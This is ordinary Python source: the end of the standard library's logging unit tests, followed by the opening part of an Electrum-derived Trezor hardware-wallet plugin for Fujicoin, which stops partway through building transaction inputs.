self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
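# The loop below generates one test_compute_rollover_<when> method per rollover
# interval ('S', 'M', 'H', 'D', 'MIDNIGHT', 'W0') and attaches it to
# TimedRotatingFileHandlerTest via setattr.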
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
support.run_unittest(
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase)
if __name__ == "__main__":
test_main()
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 6, 0)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Fujicoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
